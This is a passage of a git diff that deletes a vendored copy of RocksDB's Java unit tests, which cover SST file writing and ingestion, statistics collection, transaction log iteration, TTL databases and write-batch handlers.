-  private File newSstFile(final List<KeyValueWithOp> keyValues,
-      boolean useJavaBytewiseComparator) throws IOException, RocksDBException {
-    final EnvOptions envOptions = new EnvOptions();
-    final StringAppendOperator stringAppendOperator = new StringAppendOperator();
-    final Options options = new Options().setMergeOperator(stringAppendOperator);
-    SstFileWriter sstFileWriter = null;
-    ComparatorOptions comparatorOptions = null;
-    BytewiseComparator comparator = null;
-    if (useJavaBytewiseComparator) {
-      comparatorOptions = new ComparatorOptions();
-      comparator = new BytewiseComparator(comparatorOptions);
-      options.setComparator(comparator);
-      sstFileWriter = new SstFileWriter(envOptions, options, comparator);
-    } else {
-      sstFileWriter = new SstFileWriter(envOptions, options);
-    }
-
-    final File sstFile = parentFolder.newFile(SST_FILE_NAME);
-    try {
-      sstFileWriter.open(sstFile.getAbsolutePath());
-      for (KeyValueWithOp keyValue : keyValues) {
-        Slice keySlice = new Slice(keyValue.getKey());
-        Slice valueSlice = new Slice(keyValue.getValue());
-        byte[] keyBytes = keyValue.getKey().getBytes();
-        byte[] valueBytes = keyValue.getValue().getBytes();
-        switch (keyValue.getOpType()) {
-          case PUT:
-            sstFileWriter.put(keySlice, valueSlice);
-            break;
-          case PUT_BYTES:
-            sstFileWriter.put(keyBytes, valueBytes);
-            break;
-          case MERGE:
-            sstFileWriter.merge(keySlice, valueSlice);
-            break;
-          case MERGE_BYTES:
-            sstFileWriter.merge(keyBytes, valueBytes);
-            break;
-          case DELETE:
-            sstFileWriter.delete(keySlice);
-            break;
-          case DELETE_BYTES:
-            sstFileWriter.delete(keyBytes);
-            break;
-          default:
-            fail("Unsupported op type");
-        }
-        keySlice.close();
-        valueSlice.close();
-      }
-      sstFileWriter.finish();
-    } finally {
-      assertThat(sstFileWriter).isNotNull();
-      sstFileWriter.close();
-      options.close();
-      envOptions.close();
-      if (comparatorOptions != null) {
-        comparatorOptions.close();
-      }
-      if (comparator != null) {
-        comparator.close();
-      }
-    }
-    return sstFile;
-  }
-
-  @Test
-  public void generateSstFileWithJavaComparator()
-      throws RocksDBException, IOException {
-    final List<KeyValueWithOp> keyValues = new ArrayList<>();
-    keyValues.add(new KeyValueWithOp("key1", "value1", OpType.PUT));
-    keyValues.add(new KeyValueWithOp("key2", "value2", OpType.PUT));
-    keyValues.add(new KeyValueWithOp("key3", "value3", OpType.MERGE));
-    keyValues.add(new KeyValueWithOp("key4", "value4", OpType.MERGE));
-    keyValues.add(new KeyValueWithOp("key5", "", OpType.DELETE));
-
-    newSstFile(keyValues, true);
-  }
-
-  @Test
-  public void generateSstFileWithNativeComparator()
-      throws RocksDBException, IOException {
-    final List<KeyValueWithOp> keyValues = new ArrayList<>();
-    keyValues.add(new KeyValueWithOp("key1", "value1", OpType.PUT));
-    keyValues.add(new KeyValueWithOp("key2", "value2", OpType.PUT));
-    keyValues.add(new KeyValueWithOp("key3", "value3", OpType.MERGE));
-    keyValues.add(new KeyValueWithOp("key4", "value4", OpType.MERGE));
-    keyValues.add(new KeyValueWithOp("key5", "", OpType.DELETE));
-
-    newSstFile(keyValues, false);
-  }
-
-  @Test
-  public void ingestSstFile() throws RocksDBException, IOException {
-    final List<KeyValueWithOp> keyValues = new ArrayList<>();
-    keyValues.add(new KeyValueWithOp("key1", "value1", OpType.PUT));
-    keyValues.add(new KeyValueWithOp("key2", "value2", OpType.PUT));
-    keyValues.add(new KeyValueWithOp("key3", "value3", OpType.PUT_BYTES));
-    keyValues.add(new KeyValueWithOp("key4", "value4", OpType.MERGE));
-    keyValues.add(new KeyValueWithOp("key5", "value5", OpType.MERGE_BYTES));
-    keyValues.add(new KeyValueWithOp("key6", "", OpType.DELETE));
-    keyValues.add(new KeyValueWithOp("key7", "", OpType.DELETE));
-
-
-    final File sstFile = newSstFile(keyValues, false);
-    final File dbFolder = parentFolder.newFolder(DB_DIRECTORY_NAME);
-    try(final StringAppendOperator stringAppendOperator =
-            new StringAppendOperator();
-        final Options options = new Options()
-            .setCreateIfMissing(true)
-            .setMergeOperator(stringAppendOperator);
-        final RocksDB db = RocksDB.open(options, dbFolder.getAbsolutePath());
-        final IngestExternalFileOptions ingestExternalFileOptions =
-            new IngestExternalFileOptions()) {
-      db.ingestExternalFile(Arrays.asList(sstFile.getAbsolutePath()),
-          ingestExternalFileOptions);
-
-      assertThat(db.get("key1".getBytes())).isEqualTo("value1".getBytes());
-      assertThat(db.get("key2".getBytes())).isEqualTo("value2".getBytes());
-      assertThat(db.get("key3".getBytes())).isEqualTo("value3".getBytes());
-      assertThat(db.get("key4".getBytes())).isEqualTo("value4".getBytes());
-      assertThat(db.get("key5".getBytes())).isEqualTo("value5".getBytes());
-      assertThat(db.get("key6".getBytes())).isEqualTo(null);
-      assertThat(db.get("key7".getBytes())).isEqualTo(null);
-    }
-  }
-
-  @Test
-  public void ingestSstFile_cf() throws RocksDBException, IOException {
-    final List<KeyValueWithOp> keyValues = new ArrayList<>();
-    keyValues.add(new KeyValueWithOp("key1", "value1", OpType.PUT));
-    keyValues.add(new KeyValueWithOp("key2", "value2", OpType.PUT));
-    keyValues.add(new KeyValueWithOp("key3", "value3", OpType.MERGE));
-    keyValues.add(new KeyValueWithOp("key4", "", OpType.DELETE));
-
-    final File sstFile = newSstFile(keyValues, false);
-    final File dbFolder = parentFolder.newFolder(DB_DIRECTORY_NAME);
-    try(final StringAppendOperator stringAppendOperator =
-            new StringAppendOperator();
-        final Options options = new Options()
-            .setCreateIfMissing(true)
-            .setCreateMissingColumnFamilies(true)
-            .setMergeOperator(stringAppendOperator);
-        final RocksDB db = RocksDB.open(options, dbFolder.getAbsolutePath());
-        final IngestExternalFileOptions ingestExternalFileOptions =
-            new IngestExternalFileOptions()) {
-
-      try(final ColumnFamilyOptions cf_opts = new ColumnFamilyOptions()
-              .setMergeOperator(stringAppendOperator);
-          final ColumnFamilyHandle cf_handle = db.createColumnFamily(
-              new ColumnFamilyDescriptor("new_cf".getBytes(), cf_opts))) {
-
-        db.ingestExternalFile(cf_handle,
-            Arrays.asList(sstFile.getAbsolutePath()),
-            ingestExternalFileOptions);
-
-        assertThat(db.get(cf_handle,
-            "key1".getBytes())).isEqualTo("value1".getBytes());
-        assertThat(db.get(cf_handle,
-            "key2".getBytes())).isEqualTo("value2".getBytes());
-        assertThat(db.get(cf_handle,
-            "key3".getBytes())).isEqualTo("value3".getBytes());
-        assertThat(db.get(cf_handle,
-            "key4".getBytes())).isEqualTo(null);
-      }
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/StatisticsCollectorTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/StatisticsCollectorTest.java
deleted file mode 100644
index 8dd0cd4..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/StatisticsCollectorTest.java
+++ /dev/null
@@ -1,55 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import java.util.Collections;
-
-import org.junit.ClassRule;
-import org.junit.Rule;
-import org.junit.Test;
-import org.junit.rules.TemporaryFolder;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class StatisticsCollectorTest {
-
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  @Rule
-  public TemporaryFolder dbFolder = new TemporaryFolder();
-
-  @Test
-  public void statisticsCollector()
-      throws InterruptedException, RocksDBException {
-    try (final Statistics statistics = new Statistics();
-            final Options opt = new Options()
-        .setStatistics(statistics)
-        .setCreateIfMissing(true);
-         final RocksDB db = RocksDB.open(opt,
-             dbFolder.getRoot().getAbsolutePath())) {
-
-      try(final Statistics stats = opt.statistics()) {
-
-        final StatsCallbackMock callback = new StatsCallbackMock();
-        final StatsCollectorInput statsInput =
-                new StatsCollectorInput(stats, callback);
-
-        final StatisticsCollector statsCollector = new StatisticsCollector(
-                Collections.singletonList(statsInput), 100);
-        statsCollector.start();
-
-        Thread.sleep(1000);
-
-        assertThat(callback.tickerCallbackCount).isGreaterThan(0);
-        assertThat(callback.histCallbackCount).isGreaterThan(0);
-
-        statsCollector.shutDown(1000);
-      }
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/StatisticsTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/StatisticsTest.java
deleted file mode 100644
index 2103c2f..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/StatisticsTest.java
+++ /dev/null
@@ -1,160 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import org.junit.ClassRule;
-import org.junit.Rule;
-import org.junit.Test;
-import org.junit.rules.TemporaryFolder;
-
-import java.nio.charset.StandardCharsets;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class StatisticsTest {
-
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  @Rule
-  public TemporaryFolder dbFolder = new TemporaryFolder();
-
-  @Test
-  public void statsLevel() throws RocksDBException {
-    final Statistics statistics = new Statistics();
-    statistics.setStatsLevel(StatsLevel.ALL);
-    assertThat(statistics.statsLevel()).isEqualTo(StatsLevel.ALL);
-  }
-
-  @Test
-  public void getTickerCount() throws RocksDBException {
-    try (final Statistics statistics = new Statistics();
-         final Options opt = new Options()
-             .setStatistics(statistics)
-             .setCreateIfMissing(true);
-         final RocksDB db = RocksDB.open(opt,
-             dbFolder.getRoot().getAbsolutePath())) {
-
-      final byte[] key = "some-key".getBytes(StandardCharsets.UTF_8);
-      final byte[] value = "some-value".getBytes(StandardCharsets.UTF_8);
-
-      db.put(key, value);
-      for(int i = 0; i < 10; i++) {
-        db.get(key);
-      }
-
-      assertThat(statistics.getTickerCount(TickerType.BYTES_READ)).isGreaterThan(0);
-    }
-  }
-
-  @Test
-  public void getAndResetTickerCount() throws RocksDBException {
-    try (final Statistics statistics = new Statistics();
-         final Options opt = new Options()
-             .setStatistics(statistics)
-             .setCreateIfMissing(true);
-         final RocksDB db = RocksDB.open(opt,
-             dbFolder.getRoot().getAbsolutePath())) {
-
-      final byte[] key = "some-key".getBytes(StandardCharsets.UTF_8);
-      final byte[] value = "some-value".getBytes(StandardCharsets.UTF_8);
-
-      db.put(key, value);
-      for(int i = 0; i < 10; i++) {
-        db.get(key);
-      }
-
-      final long read = statistics.getAndResetTickerCount(TickerType.BYTES_READ);
-      assertThat(read).isGreaterThan(0);
-
-      final long readAfterReset = statistics.getTickerCount(TickerType.BYTES_READ);
-      assertThat(readAfterReset).isLessThan(read);
-    }
-  }
-
-  @Test
-  public void getHistogramData() throws RocksDBException {
-    try (final Statistics statistics = new Statistics();
-         final Options opt = new Options()
-             .setStatistics(statistics)
-             .setCreateIfMissing(true);
-         final RocksDB db = RocksDB.open(opt,
-             dbFolder.getRoot().getAbsolutePath())) {
-
-      final byte[] key = "some-key".getBytes(StandardCharsets.UTF_8);
-      final byte[] value = "some-value".getBytes(StandardCharsets.UTF_8);
-
-      db.put(key, value);
-      for(int i = 0; i < 10; i++) {
-        db.get(key);
-      }
-
-      final HistogramData histogramData = statistics.getHistogramData(HistogramType.BYTES_PER_READ);
-      assertThat(histogramData).isNotNull();
-      assertThat(histogramData.getAverage()).isGreaterThan(0);
-    }
-  }
-
-  @Test
-  public void getHistogramString() throws RocksDBException {
-    try (final Statistics statistics = new Statistics();
-         final Options opt = new Options()
-             .setStatistics(statistics)
-             .setCreateIfMissing(true);
-         final RocksDB db = RocksDB.open(opt,
-             dbFolder.getRoot().getAbsolutePath())) {
-
-      final byte[] key = "some-key".getBytes(StandardCharsets.UTF_8);
-      final byte[] value = "some-value".getBytes(StandardCharsets.UTF_8);
-
-      for(int i = 0; i < 10; i++) {
-        db.put(key, value);
-      }
-
-      assertThat(statistics.getHistogramString(HistogramType.BYTES_PER_WRITE)).isNotNull();
-    }
-  }
-
-  @Test
-  public void reset() throws RocksDBException {
-    try (final Statistics statistics = new Statistics();
-         final Options opt = new Options()
-             .setStatistics(statistics)
-             .setCreateIfMissing(true);
-         final RocksDB db = RocksDB.open(opt,
-             dbFolder.getRoot().getAbsolutePath())) {
-
-      final byte[] key = "some-key".getBytes(StandardCharsets.UTF_8);
-      final byte[] value = "some-value".getBytes(StandardCharsets.UTF_8);
-
-      db.put(key, value);
-      for(int i = 0; i < 10; i++) {
-        db.get(key);
-      }
-
-      final long read = statistics.getTickerCount(TickerType.BYTES_READ);
-      assertThat(read).isGreaterThan(0);
-
-      statistics.reset();
-
-      final long readAfterReset = statistics.getTickerCount(TickerType.BYTES_READ);
-      assertThat(readAfterReset).isLessThan(read);
-    }
-  }
-
-  @Test
-  public void ToString() throws RocksDBException {
-    try (final Statistics statistics = new Statistics();
-         final Options opt = new Options()
-             .setStatistics(statistics)
-             .setCreateIfMissing(true);
-         final RocksDB db = RocksDB.open(opt,
-             dbFolder.getRoot().getAbsolutePath())) {
-      assertThat(statistics.toString()).isNotNull();
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/StatsCallbackMock.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/StatsCallbackMock.java
deleted file mode 100644
index af8db0c..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/StatsCallbackMock.java
+++ /dev/null
@@ -1,20 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-public class StatsCallbackMock implements StatisticsCollectorCallback {
-  public int tickerCallbackCount = 0;
-  public int histCallbackCount = 0;
-
-  public void tickerCallback(TickerType tickerType, long tickerCount) {
-    tickerCallbackCount++;
-  }
-
-  public void histogramCallback(HistogramType histType,
-      HistogramData histData) {
-    histCallbackCount++;
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/TransactionLogIteratorTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/TransactionLogIteratorTest.java
deleted file mode 100644
index b619258..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/TransactionLogIteratorTest.java
+++ /dev/null
@@ -1,138 +0,0 @@
-package org.rocksdb;
-
-import org.junit.ClassRule;
-import org.junit.Rule;
-import org.junit.Test;
-import org.junit.rules.TemporaryFolder;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class TransactionLogIteratorTest {
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  @Rule
-  public TemporaryFolder dbFolder = new TemporaryFolder();
-
-  @Test
-  public void transactionLogIterator() throws RocksDBException {
-    try (final Options options = new Options()
-        .setCreateIfMissing(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath());
-         final TransactionLogIterator transactionLogIterator =
-             db.getUpdatesSince(0)) {
-      //no-op
-    }
-  }
-
-  @Test
-  public void getBatch() throws RocksDBException {
-    final int numberOfPuts = 5;
-    try (final Options options = new Options()
-        .setCreateIfMissing(true)
-        .setWalTtlSeconds(1000)
-        .setWalSizeLimitMB(10);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath())) {
-
-      for (int i = 0; i < numberOfPuts; i++) {
-        db.put(String.valueOf(i).getBytes(),
-            String.valueOf(i).getBytes());
-      }
-      db.flush(new FlushOptions().setWaitForFlush(true));
-
-      // the latest sequence number is 5 because 5 puts
-      // were written beforehand
-      assertThat(db.getLatestSequenceNumber()).
-          isEqualTo(numberOfPuts);
-
-      // insert 5 writes into a cf
-      try (final ColumnFamilyHandle cfHandle = db.createColumnFamily(
-          new ColumnFamilyDescriptor("new_cf".getBytes()))) {
-        for (int i = 0; i < numberOfPuts; i++) {
-          db.put(cfHandle, String.valueOf(i).getBytes(),
-              String.valueOf(i).getBytes());
-        }
-        // the latest sequence number is 10 because
-        // (5 + 5) puts were written beforehand
-        assertThat(db.getLatestSequenceNumber()).
-            isEqualTo(numberOfPuts + numberOfPuts);
-
-        // Get updates since the beginning
-        try (final TransactionLogIterator transactionLogIterator =
-                 db.getUpdatesSince(0)) {
-          assertThat(transactionLogIterator.isValid()).isTrue();
-          transactionLogIterator.status();
-
-          // The first sequence number is 1
-          final TransactionLogIterator.BatchResult batchResult =
-              transactionLogIterator.getBatch();
-          assertThat(batchResult.sequenceNumber()).isEqualTo(1);
-        }
-      }
-    }
-  }
-
-  @Test
-  public void transactionLogIteratorStallAtLastRecord()
-      throws RocksDBException {
-    try (final Options options = new Options()
-        .setCreateIfMissing(true)
-        .setWalTtlSeconds(1000)
-        .setWalSizeLimitMB(10);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath())) {
-
-      db.put("key1".getBytes(), "value1".getBytes());
-      // Get updates since the beginning
-      try (final TransactionLogIterator transactionLogIterator =
-               db.getUpdatesSince(0)) {
-        transactionLogIterator.status();
-        assertThat(transactionLogIterator.isValid()).isTrue();
-        transactionLogIterator.next();
-        assertThat(transactionLogIterator.isValid()).isFalse();
-        transactionLogIterator.status();
-        db.put("key2".getBytes(), "value2".getBytes());
-        transactionLogIterator.next();
-        transactionLogIterator.status();
-        assertThat(transactionLogIterator.isValid()).isTrue();
-      }
-    }
-  }
-
-  @Test
-  public void transactionLogIteratorCheckAfterRestart()
-      throws RocksDBException {
-    final int numberOfKeys = 2;
-    try (final Options options = new Options()
-        .setCreateIfMissing(true)
-        .setWalTtlSeconds(1000)
-        .setWalSizeLimitMB(10)) {
-
-      try (final RocksDB db = RocksDB.open(options,
-          dbFolder.getRoot().getAbsolutePath())) {
-        db.put("key1".getBytes(), "value1".getBytes());
-        db.put("key2".getBytes(), "value2".getBytes());
-        db.flush(new FlushOptions().setWaitForFlush(true));
-
-      }
-
-      // reopen
-      try (final RocksDB db = RocksDB.open(options,
-          dbFolder.getRoot().getAbsolutePath())) {
-        assertThat(db.getLatestSequenceNumber()).isEqualTo(numberOfKeys);
-
-        try (final TransactionLogIterator transactionLogIterator =
-                 db.getUpdatesSince(0)) {
-          for (int i = 0; i < numberOfKeys; i++) {
-            transactionLogIterator.status();
-            assertThat(transactionLogIterator.isValid()).isTrue();
-            transactionLogIterator.next();
-          }
-        }
-      }
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/TtlDBTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/TtlDBTest.java
deleted file mode 100644
index cd72634..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/TtlDBTest.java
+++ /dev/null
@@ -1,112 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import org.junit.ClassRule;
-import org.junit.Rule;
-import org.junit.Test;
-import org.junit.rules.TemporaryFolder;
-
-import java.util.ArrayList;
-import java.util.Arrays;
-import java.util.List;
-import java.util.concurrent.TimeUnit;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class TtlDBTest {
-
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  @Rule
-  public TemporaryFolder dbFolder = new TemporaryFolder();
-
-  @Test
-  public void ttlDBOpen() throws RocksDBException, InterruptedException {
-    try (final Options options = new Options().setCreateIfMissing(true).setMaxCompactionBytes(0);
-         final TtlDB ttlDB = TtlDB.open(options, dbFolder.getRoot().getAbsolutePath())) {
-      ttlDB.put("key".getBytes(), "value".getBytes());
-      assertThat(ttlDB.get("key".getBytes())).
-          isEqualTo("value".getBytes());
-      assertThat(ttlDB.get("key".getBytes())).isNotNull();
-    }
-  }
-
-  @Test
-  public void ttlDBOpenWithTtl() throws RocksDBException, InterruptedException {
-    try (final Options options = new Options().setCreateIfMissing(true).setMaxCompactionBytes(0);
-         final TtlDB ttlDB = TtlDB.open(options, dbFolder.getRoot().getAbsolutePath(), 1, false);) {
-      ttlDB.put("key".getBytes(), "value".getBytes());
-      assertThat(ttlDB.get("key".getBytes())).
-          isEqualTo("value".getBytes());
-      TimeUnit.SECONDS.sleep(2);
-      ttlDB.compactRange();
-      assertThat(ttlDB.get("key".getBytes())).isNull();
-    }
-  }
-
-  @Test
-  public void ttlDbOpenWithColumnFamilies() throws RocksDBException,
-      InterruptedException {
-    final List<ColumnFamilyDescriptor> cfNames = Arrays.asList(
-        new ColumnFamilyDescriptor(RocksDB.DEFAULT_COLUMN_FAMILY),
-        new ColumnFamilyDescriptor("new_cf".getBytes())
-    );
-    final List<Integer> ttlValues = Arrays.asList(0, 1);
-
-    final List<ColumnFamilyHandle> columnFamilyHandleList = new ArrayList<>();
-    try (final DBOptions dbOptions = new DBOptions()
-        .setCreateMissingColumnFamilies(true)
-        .setCreateIfMissing(true);
-         final TtlDB ttlDB = TtlDB.open(dbOptions,
-             dbFolder.getRoot().getAbsolutePath(), cfNames,
-             columnFamilyHandleList, ttlValues, false)) {
-      try {
-        ttlDB.put("key".getBytes(), "value".getBytes());
-        assertThat(ttlDB.get("key".getBytes())).
-            isEqualTo("value".getBytes());
-        ttlDB.put(columnFamilyHandleList.get(1), "key".getBytes(),
-            "value".getBytes());
-        assertThat(ttlDB.get(columnFamilyHandleList.get(1),
-            "key".getBytes())).isEqualTo("value".getBytes());
-        TimeUnit.SECONDS.sleep(2);
-
-        ttlDB.compactRange();
-        ttlDB.compactRange(columnFamilyHandleList.get(1));
-
-        assertThat(ttlDB.get("key".getBytes())).isNotNull();
-        assertThat(ttlDB.get(columnFamilyHandleList.get(1),
-            "key".getBytes())).isNull();
-      } finally {
-        for (final ColumnFamilyHandle columnFamilyHandle :
-            columnFamilyHandleList) {
-          columnFamilyHandle.close();
-        }
-      }
-    }
-  }
-
-  @Test
-  public void createTtlColumnFamily() throws RocksDBException,
-      InterruptedException {
-    try (final Options options = new Options().setCreateIfMissing(true);
-         final TtlDB ttlDB = TtlDB.open(options,
-             dbFolder.getRoot().getAbsolutePath());
-         final ColumnFamilyHandle columnFamilyHandle =
-             ttlDB.createColumnFamilyWithTtl(
-                 new ColumnFamilyDescriptor("new_cf".getBytes()), 1)) {
-      ttlDB.put(columnFamilyHandle, "key".getBytes(),
-          "value".getBytes());
-      assertThat(ttlDB.get(columnFamilyHandle, "key".getBytes())).
-          isEqualTo("value".getBytes());
-      TimeUnit.SECONDS.sleep(2);
-      ttlDB.compactRange(columnFamilyHandle);
-      assertThat(ttlDB.get(columnFamilyHandle, "key".getBytes())).isNull();
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/Types.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/Types.java
deleted file mode 100644
index c3c1de8..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/Types.java
+++ /dev/null
@@ -1,43 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * Simple type conversion methods
- * for use in tests
- */
-public class Types {
-
-  /**
-   * Convert first 4 bytes of a byte array to an int
-   *
-   * @param data The byte array
-   *
-   * @return An integer
-   */
-  public static int byteToInt(final byte data[]) {
-    return (data[0] & 0xff) |
-        ((data[1] & 0xff) << 8) |
-        ((data[2] & 0xff) << 16) |
-        ((data[3] & 0xff) << 24);
-  }
-
-  /**
-   * Convert an int to 4 bytes
-   *
-   * @param v The int
-   *
-   * @return A byte array containing 4 bytes
-   */
-  public static byte[] intToByte(final int v) {
-    return new byte[] {
-        (byte)((v >>> 0) & 0xff),
-        (byte)((v >>> 8) & 0xff),
-        (byte)((v >>> 16) & 0xff),
-        (byte)((v >>> 24) & 0xff)
-    };
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/WALRecoveryModeTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/WALRecoveryModeTest.java
deleted file mode 100644
index 2a0133f..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/WALRecoveryModeTest.java
+++ /dev/null
@@ -1,22 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import org.junit.Test;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-
-public class WALRecoveryModeTest {
-
-  @Test
-  public void getWALRecoveryMode() {
-    for (final WALRecoveryMode walRecoveryMode : WALRecoveryMode.values()) {
-      assertThat(WALRecoveryMode.getWALRecoveryMode(walRecoveryMode.getValue()))
-          .isEqualTo(walRecoveryMode);
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/WriteBatchHandlerTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/WriteBatchHandlerTest.java
deleted file mode 100644
index 646a31c..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/WriteBatchHandlerTest.java
+++ /dev/null
@@ -1,169 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import java.io.IOException;
-import java.util.ArrayList;
-import java.util.Arrays;
-import java.util.List;
-
-import org.junit.ClassRule;
-import org.junit.Test;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-
-public class WriteBatchHandlerTest {
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  @Test
-  public void writeBatchHandler() throws IOException, RocksDBException {
-    // setup test data
-    final List<Tuple<Action, Tuple<byte[], byte[]>>> testEvents = Arrays.asList(
-        new Tuple<>(Action.DELETE,
-            new Tuple<byte[], byte[]>("k0".getBytes(), null)),
-        new Tuple<>(Action.PUT,
-            new Tuple<>("k1".getBytes(), "v1".getBytes())),
-        new Tuple<>(Action.PUT,
-            new Tuple<>("k2".getBytes(), "v2".getBytes())),
-        new Tuple<>(Action.PUT,
-            new Tuple<>("k3".getBytes(), "v3".getBytes())),
-        new Tuple<>(Action.LOG,
-            new Tuple<byte[], byte[]>(null, "log1".getBytes())),
-        new Tuple<>(Action.MERGE,
-            new Tuple<>("k2".getBytes(), "v22".getBytes())),
-        new Tuple<>(Action.DELETE,
-            new Tuple<byte[], byte[]>("k3".getBytes(), null))
-    );
-
-    // load test data to the write batch
-    try (final WriteBatch batch = new WriteBatch()) {
-      for (final Tuple<Action, Tuple<byte[], byte[]>> testEvent : testEvents) {
-        final Tuple<byte[], byte[]> data = testEvent.value;
-        switch (testEvent.key) {
-
-          case PUT:
-            batch.put(data.key, data.value);
-            break;
-
-          case MERGE:
-            batch.merge(data.key, data.value);
-            break;
-
-          case DELETE:
-            batch.remove(data.key);
-            break;
-
-          case LOG:
-            batch.putLogData(data.value);
-            break;
-        }
-      }
-
-      // attempt to read test data back from the WriteBatch by iterating
-      // with a handler
-      try (final CapturingWriteBatchHandler handler =
-               new CapturingWriteBatchHandler()) {
-        batch.iterate(handler);
-
-        // compare the results to the test data
-        final List<Tuple<Action, Tuple<byte[], byte[]>>> actualEvents =
-            handler.getEvents();
-        assertThat(testEvents.size()).isSameAs(actualEvents.size());
-
-        for (int i = 0; i < testEvents.size(); i++) {
-          assertThat(equals(testEvents.get(i), actualEvents.get(i))).isTrue();
-        }
-      }
-    }
-  }
-
-  private static boolean equals(
-      final Tuple<Action, Tuple<byte[], byte[]>> expected,
-      final Tuple<Action, Tuple<byte[], byte[]>> actual) {
-    if (!expected.key.equals(actual.key)) {
-      return false;
-    }
-
-    final Tuple<byte[], byte[]> expectedData = expected.value;
-    final Tuple<byte[], byte[]> actualData = actual.value;
-
-    return equals(expectedData.key, actualData.key)
-        && equals(expectedData.value, actualData.value);
-  }
-
-  private static boolean equals(byte[] expected, byte[] actual) {
-    if (expected != null) {
-      return Arrays.equals(expected, actual);
-    } else {
-      return actual == null;
-    }
-  }
-
-  private static class Tuple<K, V> {
-    public final K key;
-    public final V value;
-
-    public Tuple(final K key, final V value) {
-      this.key = key;
-      this.value = value;
-    }
-  }
-
-  /**
-   * Enumeration of Write Batch
-   * event actions
-   */
-  private enum Action { PUT, MERGE, DELETE, DELETE_RANGE, LOG }
-
-  /**
-   * A simple WriteBatch Handler which adds a record
-   * of each event that it receives to a list
-   */
-  private static class CapturingWriteBatchHandler extends WriteBatch.Handler {
-
-    private final List<Tuple<Action, Tuple<byte[], byte[]>>> events
-        = new ArrayList<>();
-
-    /**
-     * Returns a copy of the current events list
-     *
-     * @return a list of the events which have happened upto now
-     */
-    public List<Tuple<Action, Tuple<byte[], byte[]>>> getEvents() {
-      return new ArrayList<>(events);
-    }
-
-    @Override
-    public void put(final byte[] key, final byte[] value) {
-      events.add(new Tuple<>(Action.PUT, new Tuple<>(key, value)));
-    }
-
-    @Override
-    public void merge(final byte[] key, final byte[] value) {
-      events.add(new Tuple<>(Action.MERGE, new Tuple<>(key, value)));
-    }
-
-    @Override
-    public void delete(final byte[] key) {
